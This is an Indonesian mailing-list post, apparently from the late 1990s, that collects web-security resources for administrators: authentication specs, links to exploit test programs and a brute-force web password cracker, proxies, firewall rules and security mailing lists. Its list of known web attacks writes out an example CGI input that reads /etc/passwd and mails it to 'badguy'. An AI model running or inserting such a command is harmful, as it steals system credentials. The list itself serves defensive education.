Berikut makalah tentang sekuriti > Dikumpulkan dari berbagai sumber, terutama Sams System Administration, > networking and security. > Semoga berguna buat para web admin utk mengamankan sistemnya (butuh saran > nih source2x bagus berkaitan dg network security untuk network admin - > mungkin menyusul). Beberapa resource mungkin sudah tidak up to date > mohon maaf sebelumnya. > > Web Otentifikasi dan Enkripsi > 1. Basic Otentifikasi > http://www.w3.org/protocols/http/1.1/draft-ietf-http-v11-spec-rev-0.1.txt > > 2. Kerberos Otentifikasi > http://web.mit.edu/kerberos/www > > 3. PCT > http://premium.microsoft.com/msdn/library/bkgrnd/html/msdn_pct.htm > > 4. SET > http://ftp.rsa.com/set/index.hmls > > 5. SSL > http://home.netscape.com/eng/ssl3/index.html > > 6. P3P > http://www.w3.org/p3p > > Security Tools Untuk Meningkatkan Keamanan Web > 1. PHP Exploit Test Program > http://www.eng.auburn.edu/users/rayh/software/phf.html > > 2. Latro Exploit Test Program > http://www.perl.org/CPAN/authors/Tom_christainsen/scripts/latro.gz > > 3. Multiple CGI Exploit Test Program > http://www.cdc.net/~x/exploit/multiple-test-cgi.asc > > 4. PHP-CGI exploit test Program > http://rootshell.connectnet.com/hacking/php-exploit.txt > > 5. WWW count exploit Test Program > http://rootshell.connectnet.com/hacking/wwwcount.c > > 6. Bruce Force web Password Cracker > http://rootshell.connectnet.com/hacking/brute_web.c > > WWW Related Security Tools > 1. Latro (Untuk mencek miskonfigurasi PERL di web site) > http://languange.perl.com/news/latro-announce.html > > 2. Finjan Java Scan (Untuk mencek applet java dgn attribut tdk benar) > http://www.finjan.com > > 3. CGI Wrap (Menjalankan program CGI pd user yg diinstallkan utk > pengamatan) > http://wwwcgi.umr.edu/~cgiwrap > > Web Proxy Server yang Cukup Baik > 1. Netscape (komersil) > http://www.netscape.com/comprod/server-central/product/proxy/index.html > > 2. SOCKS proxy distr. (license) > http://www.socks.nec.com > > 3. SQUID proxy server (public) > http://squid.nlanr.net/squid > > 4. Harvest Cache Accelerator (public) > http://excalibur.usc.edu > > 5. Apache Proxy (public) > http://www.apache.org/docs/mod/mod_proxy.html > > Cryptograph > 1. Internasional SSL Solution > - Strong SSL Proxy > http://www.rc.ch/products/ssl > http://stronghold.ukweb.com/safepassage > - SSL Internasional Server > http://stronghold.ukweb.com/stronghold > > 2. Internasional E-commerce > - Openmarket Inc > http://www.openmarket.com > > Well Know Web Attacks (resourcenya dpt dicari dgn keyword topik) > 1. CGI Form Input: Cat /etc/passwd | mail badguy > Pass shell program dan mengirimkan password ke badguy > > 2. ActiveX Exploit > http://www8.zdnet.com/zdmag/news/199702/13/news2.htm > > 3. Javascript Tracking Bugs > Javascript bisa masking browser anda dan mereport aktivitas anda > > 4. NCSA Httpd Buffer Overflows > > 5. NT Exploit Using Browser (Untuk NT 4 buat terpatch, NT login dan > password dikirimkan pada plain, clear, text) > http://www.microsoft.com/ie/security/?/ie/security/javamischief.htm > > 6. PHF Probe > > 7. FrontPage 98 Bug untuk Http file upload > http://www.worldgate.com/~marcs/fp > > Konfigurasi Firewall Untuk Melindungi WebServer > 1. Ijinkan trafik port 80 dari Cloud (internet) dan deny trafik lainnya > dari Cloud > > 2. Jangan bolehkan web server untuk melakukan "inisiasi" dalam koneksi > awal. Hanya receive dan respond terhadap koneksi. Hal ini untuk > mencegah web server mendapat serangan dari suatu komputer. Pengecualian > untuk DNS reguest, e-mail (SMTP dikonfigurasi pada mesin tertentu) > Ini berlaku pula pada router, pada ACL (access control list) pastikan > dengan extended ACL dengan tambahan command established, pada tiap > penulisan suatu list ACL ke router pada port http. > > 3. Jika Software mendukung, aktifkan TCP SYN Flood Protection > Feature. Akan membantu web server dari serangan yang berpotensi > berbahanya > > 4. Log semua Failed connection dan review koneksi dari mana asal hostnya > > Product desktop (user side) untuk Melindung Terhadap mobile code dan > active content > 1. Cyber Media's Guarddog > http://www.cybermedia.com/products/guarddog/gdhome.html > > 2. eSafe > http://www.esafe.com/products.html > > 3. Finjan's SurfinShield > http://www.finjan.com/products_surfincorp.cfm > > 4. Security7's Safegate & Ultragate > http://www.security7.com/products > > 5. Symantec Norton AV > http://www.symantec.com/NAV > > Good Web Security Milist > 1. BUGTRAQ ([EMAIL PROTECTED]) > 2. Best of Security List ([EMAIL PROTECTED]) > 3. CERT advisory ([EMAIL PROTECTED]) > 4. Http-TNG security list ([EMAIL PROTECTED]) > 5. SSL Talk ([EMAIL PROTECTED]) > 6. WWWSecurity List ([EMAIL PROTECTED]) > > > > > > __________________________________________________________________________ > __ > Indo IT Center - Indonesian IT community, professionals, solutions, and > jobs > Subscribe : [EMAIL PROTECTED] > Unsubscribe : [EMAIL PROTECTED] > Website : http://www.IndoIT.net <-- Email @IndoIT.net GRATIS! > > Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ > > RantauNet http://www.rantaunet.com ================================================= Mendaftar atau berhenti menerima RantauNet Mailing List di http://www.rantaunet.com/subscribe.php3 ATAU Kirimkan email Ke / To: [EMAIL PROTECTED] Isi email / Messages, ketik pada baris/kolom pertama: - mendaftar: subscribe rantau-net [email_anda] - berhenti: unsubscribe rantau-net [email_anda] Ket: [email_anda] = isikan alamat email anda tanpa tanda kurung ================================================= WebPage RantauNet dan Mailing List RantauNet adalah servis dari EEBNET http://eebnet.com, Airland Groups, USA =================================================